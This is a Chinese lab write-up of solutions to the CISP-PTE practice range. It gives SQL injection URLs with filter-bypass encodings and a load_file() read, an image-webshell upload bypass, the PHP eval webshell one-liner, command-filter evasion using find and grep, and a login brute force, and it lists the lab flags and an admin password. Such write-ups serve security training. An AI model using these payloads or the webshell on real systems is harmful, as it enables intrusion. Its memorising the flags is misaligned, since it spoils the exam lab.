CISP-PTE:记录基础题靶机做题思路
字数 959 2025-08-20 18:17:41
CISP-PTE基础题靶机解题思路详解
一、SQL注入绕过技巧
1. 过滤字符绕过方法
- 空格过滤:使用
%0a或%0d代替%20 - #号过滤:使用
%23代替 - union过滤:使用双写绕过(
ununionion)
2. 注入步骤详解
-
确定字段数:
http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)%0dorder%0dby%0d4%23 http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)%0dorder%0dby%0d5%23 -
使用union注入读取文件:
http://172.16.12.100:81/vulnerabilities/fu1.php?id=10%27)%0dununionion%0dselect%0d1,load_file(%22/tmp/360/key%22),2,3%23- 使用
load_file()函数读取/tmp/360/key文件 - 获取key:
8b3h4a7v
- 使用
二、文件上传突破技巧
1. 上传测试过程
- 直接上传
.php文件被拦截 - 尝试
.abcdef后缀无反应 .png图片可以上传成功
2. 绕过方法尝试
-
修改请求包:
- 修改文件后缀为
.php - 修改
Content-Type为image/png - 仍然被拦截,说明还检测文件头
- 修改文件后缀为
-
制作图片马:
- 在图片中嵌入PHP代码
- 修改后缀为
.php4可被解析
3. 获取key
- 使用蚁剑连接
- 在
/var/www/html/key.php中找到key:8t5s0x5t
三、文件包含漏洞利用
1. 利用方法
-
写入PHP文件:
<?php phpinfo(); ?> -
写入一句话木马:
<?php eval($_POST['cmd']); ?>
2. 获取key
- 使用蚁剑连接
- 在
/var/www/html/key.php中找到key:6u3x9t2p
四、命令执行绕过
1. 受限命令
cat、ls、vim、echo被禁用
2. 可用命令
find和grep未被禁用
3. 获取key步骤
- 使用
find定位key.php文件 - 使用
grep查找key关键字 - 获取key:
3s9j6c2k
五、日志分析技巧
1. 分析步骤
-
IP过滤:
grep "172.16.12.12" 日志分析.txt >> 日志分析1.txt -
状态码过滤:
grep "200" 日志分析1.txt >> 日志分析2.txt -
发现关键页面:
/adminlogin.php出现频率最高
2. 爆破登录
- 抓包使用字典爆破
- 获取凭证:
- 账号:
admin - 密码:
password123
- 账号:
- 登录后获取key:
9y6u8s5m
六、工具推荐
- 360星图日志分析工具
总结
- SQL注入:注意字符过滤绕过
- 文件上传:尝试多种绕过方式(后缀、Content-Type、文件头)
- 文件包含:利用写文件功能
- 命令执行:寻找未被禁用的替代命令
- 日志分析:分步过滤关键信息
通过以上方法可系统性地解决CISP-PTE基础题靶机中的各类漏洞利用问题。